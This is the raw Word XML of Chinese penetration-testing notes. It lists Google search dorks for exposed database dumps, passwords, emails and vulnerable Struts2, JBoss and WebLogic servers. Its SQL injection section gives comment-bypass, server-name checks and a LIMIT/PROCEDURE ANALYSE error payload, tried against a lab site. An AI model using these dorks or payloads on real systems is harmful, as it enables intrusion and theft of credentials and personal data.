      <w:r w:rsidRPr="003439C6">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>都会被显示。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23FF4D1F" w14:textId="77777777" w:rsidR="003630CF" w:rsidRDefault="003630CF" w:rsidP="003439C6"/>
    <w:p w14:paraId="143E67B2" w14:textId="77777777" w:rsidR="003630CF" w:rsidRDefault="003630CF" w:rsidP="003439C6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>新思路（先filetype</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>收集一下敏感信息：.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mdb</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>zip</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391CCB71" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w14:paraId="20B5753C" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w14:paraId="6C5F47B3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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找目录列表的敏感文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4E941E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>1.(site:域名）intitle:"index.of"(|intitle:...) (intext:)"敏感文件名/敏感后缀名" (|intext:...) (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47950090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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找url中能访问的敏感文件或者目录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4380F6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>1.(site:域名) inurl:"敏感文件名/目录名"|inurl:... (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB71F61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>2.(site:域名) filetype:后缀名 inurl:文件名(|inurl:...) (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3BA70D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>3.(site:域名) intext:"文件中独一无二的短语" (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01847D43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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>查找特定的服务器版本的网站</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C6173B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>(site:域名) intext:"Apache/1.3.27 Server at" (-忽略的文件名)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14760C80" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>数据库的转储</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FCA562E" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) # Dumping data for table(user|username|password|pass) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6058E7B8" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找子域名</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBE62D9" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>site:"主机名" -site:"</w:t>
      </w:r>
      <w:hyperlink r:id="rId93" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>www.主机名</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE2F2FB" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找网站中泄露出的邮箱地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9039FC" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>site:域名 intext:"email"(|intext:...) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740D583A" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>更多组合 我们可以把自己的搜索与能获取更好的结果的搜索项一起使用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFEA7A0" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1.当查找email时，能添加类似 通讯录 邮件 电子邮件 发送这种关键词</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A717705" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>2.查找电话号码的时候可以使用一些类似 电话 移动电话 通讯录 数字 手机</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEFE91B" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>查找网站中的人的信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CEBF65" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>site:域名 intext:"人的信息"(|intext:...) (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51917901" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>用户名相关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DC0A2E" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) intext:"username"|intext:"userid"|intext:"employee.ID"(|intext:...) "your username is" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F795B" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>密码相关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5F4816" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) intext:"password"|intext:"passcode"(|intext:...) "your password is" "reminder forgotten" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5D5E63" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>公司相关</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47FAF978" w14:textId="77777777" w:rsidR="00A42238" w:rsidRDefault="00A42238" w:rsidP="00A42238">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>(site:域名) intext:"admin"|intext:"administrator"|intext:"contact your system"|intext:"contact your administrator" (-排除的信息)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02415407" w14:textId="77777777" w:rsidR="00A42238" w:rsidRPr="00A42238" w:rsidRDefault="0048048C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Style w:val="aa"/>
        </w:rPr>
        <w:t>filetype:mdb inurl:com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F414572" w14:textId="77777777" w:rsidR="00A42238" w:rsidRPr="003439C6" w:rsidRDefault="00A42238" w:rsidP="003439C6"/>
    <w:p w14:paraId="2611E309" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRPr="003630CF" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="173F98BA" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="7DD2E3D8" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="1E7BD23A" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>pache下的strust2框架</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">： </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3CBF2F" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一般存在漏洞的特征：文件类型</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.action</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>do</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>jsp</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> .</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="287F25D3" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRPr="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>ava反序列化漏洞的java应用程序：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30DAC886" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRPr="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00CA2DA4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 w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>boss</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B9159" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00CA2DA4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blogic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7213E6E9" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00CA2DA4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Web</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008E61D9" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00CA2D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Jboss漏洞寻找语句：inurl：/web/guest/home/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714C7634" w14:textId="77777777" w:rsidR="003C3D8B" w:rsidRDefault="003C3D8B" w:rsidP="00CA2DA4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5FA7D3" w14:textId="7D02809E" w:rsidR="003C3D8B" w:rsidRDefault="003C3D8B" w:rsidP="00A14128">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D8B">
        <w:t>QL</w:t>
      </w:r>
      <w:r w:rsidRPr="003C3D8B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2382943E" w14:textId="0F859795" w:rsidR="00ED0EC3" w:rsidRDefault="00BB3AB0" w:rsidP="00ED0EC3">
      <w:hyperlink r:id="rId94" w:history="1">
        <w:r w:rsidR="00ED0EC3">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://github.com/AuFeng111/-/blob/master/sql.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00ED0EC3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00ED0EC3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>笔记本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1314D87E" w14:textId="5779E191" w:rsidR="009A2B33" w:rsidRDefault="009A2B33" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="79CF4FA3" w14:textId="1DC6EF42" w:rsidR="00757305" w:rsidRDefault="00757305" w:rsidP="00ED0EC3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>堆叠注入、偏移、dnslog、分块传输</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A05EDEB" w14:textId="2084F5B0" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00ED0EC3"/>
    <w:p w14:paraId="27D225F3" w14:textId="3F9898A9" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00724E9A">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断站库分离</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136BD47E" w14:textId="2E43C61B" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00724E9A">
      <w:r>
        <w:t xml:space="preserve">and exists(select * from admin where 1=(Select (case when host_name()=@@servername then 1 else 0 end))) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7913D418" w14:textId="08BC9834" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00724E9A"/>
    <w:p w14:paraId="4627C38E" w14:textId="7E85EF0E" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00724E9A"/>
    <w:p w14:paraId="7330EF6F" w14:textId="375E5F33" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00724E9A"/>
    <w:p w14:paraId="3A76F454" w14:textId="77777777" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00724E9A"/>
    <w:p w14:paraId="7EA114FF" w14:textId="1B53F581" w:rsidR="00724E9A" w:rsidRDefault="00724E9A" w:rsidP="00724E9A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>得到客户端主机名:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>select host_name();</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>得到服务端主机名:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
        <w:t>select @@servername;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EFE073D" w14:textId="32D15C70" w:rsidR="0066674E" w:rsidRDefault="0066674E" w:rsidP="00724E9A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24D4150C" w14:textId="39D45B6E" w:rsidR="0066674E" w:rsidRPr="00B704F6" w:rsidRDefault="0066674E" w:rsidP="00B704F6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B704F6">
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>奇葩注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C44ABA" w14:textId="5F545595" w:rsidR="0066674E" w:rsidRDefault="0066674E" w:rsidP="00B704F6">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:rStyle w:val="aa"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="aa"/>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果屏蔽了注释符</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616BB057" w14:textId="77777777" w:rsidR="0066674E" w:rsidRPr="0066674E" w:rsidRDefault="0066674E" w:rsidP="0066674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6674E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">http://www.xxx.cn/list.php?page=4&amp;cid=x' and 1=1 and </w:t>
      </w:r>
      <w:r w:rsidRPr="0066674E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="718C00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'1'</w:t>
      </w:r>
      <w:r w:rsidRPr="0066674E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0066674E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="718C00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'1      </w:t>
      </w:r>
      <w:r w:rsidRPr="0066674E">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
          <w:color w:val="718C00"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>返回正确</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBEE011" w14:textId="2BC677BF" w:rsidR="0066674E" w:rsidRDefault="00DD007F" w:rsidP="00DD007F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>between注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ECA04B" w14:textId="393F8193" w:rsidR="00DD007F" w:rsidRDefault="00DD007F" w:rsidP="00DD007F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="633D761B" wp14:editId="21F7C4A4">
            <wp:extent cx="5274310" cy="173799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AE81" w14:textId="47C3E5D3" w:rsidR="00DD007F" w:rsidRDefault="00DD007F" w:rsidP="00DD007F"/>
    <w:p w14:paraId="4154BA0D" w14:textId="01BF5CA9" w:rsidR="00DD007F" w:rsidRDefault="00DD007F" w:rsidP="00B704F6">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>imit注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25526875" w14:textId="13E3FA63" w:rsidR="0010018C" w:rsidRPr="0010018C" w:rsidRDefault="0010018C" w:rsidP="0010018C">
      <w:r>
        <w:t>limit 关键字后面还可跟</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>PROCEDURE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">两个关键字，但是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>INTO</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 后面写入文件需要知道绝对路径以及写入shell的权限，因此利用比较难，因此这里以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>PROCEDURE</w:t>
      </w:r>
      <w:r>
        <w:t>为例进行注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB6AD29" w14:textId="37F9D4A3" w:rsidR="007652F0" w:rsidRDefault="00BB3AB0" w:rsidP="007652F0">
      <w:hyperlink r:id="rId96" w:history="1">
        <w:r w:rsidR="007652F0" w:rsidRPr="005A3B24">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>http://lab1.xseclab.com/sqli5_5ba0bba6a6d1b30b956843f757889552/index.php?start=0&amp;num=1</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0ECDA634" w14:textId="1D1BF02B" w:rsidR="007652F0" w:rsidRDefault="007652F0" w:rsidP="007652F0"/>
    <w:p w14:paraId="53D95DB6" w14:textId="706B2D5B" w:rsidR="00B5783C" w:rsidRPr="007652F0" w:rsidRDefault="00B5783C" w:rsidP="007652F0">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sql原语句</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5BD58A" w14:textId="54ED02E1" w:rsidR="00B5783C" w:rsidRDefault="00DD007F" w:rsidP="00DD007F">
      <w:r>
        <w:t>SELECT field FROM table WHERE id &gt; 0 ORDER BY id LIMIT 【注入点】;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293B0E9" w14:textId="34CDC347" w:rsidR="00B5783C" w:rsidRPr="00B5783C" w:rsidRDefault="00B5783C" w:rsidP="00B5783C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3C">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>select id from users limit 0,1 union select username from users;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6E2DF8" w14:textId="33E63EF6" w:rsidR="00DD007F" w:rsidRDefault="00DD007F" w:rsidP="00DD007F"/>
    <w:p w14:paraId="230A423A" w14:textId="68A55247" w:rsidR="00DD007F" w:rsidRDefault="00CA794F" w:rsidP="00DD007F">
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ayload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00DD007F" w:rsidRPr="00DD007F">
        <w:t>procedure analyse(extractvalue(rand(),concat(0x3a,database())),2)--+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295254D2" w14:textId="568CCCC3" w:rsidR="00CA794F" w:rsidRDefault="00CA794F" w:rsidP="00DD007F"/>
    <w:p w14:paraId="729831D3" w14:textId="3EBC0742" w:rsidR="00CA794F" w:rsidRDefault="00CA794F" w:rsidP="00DD007F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="123DBBD0" wp14:editId="1D72232C">
            <wp:extent cx="5274310" cy="9182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3243" w14:textId="0A074B22" w:rsidR="00CA794F" w:rsidRDefault="00CA794F" w:rsidP="00DD007F">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引号、1=2皆报错，插入报错语句整条语句显示出来，猜测可能是limit注入</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DA06A1" w14:textId="0BAB9AF1" w:rsidR="00B5783C" w:rsidRDefault="00B5783C" w:rsidP="00B5783C">
      <w:pPr>
